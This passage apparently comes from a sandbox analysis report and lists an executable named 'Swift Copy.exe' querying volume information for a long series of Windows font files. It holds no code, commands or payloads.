          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Swift Copy.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
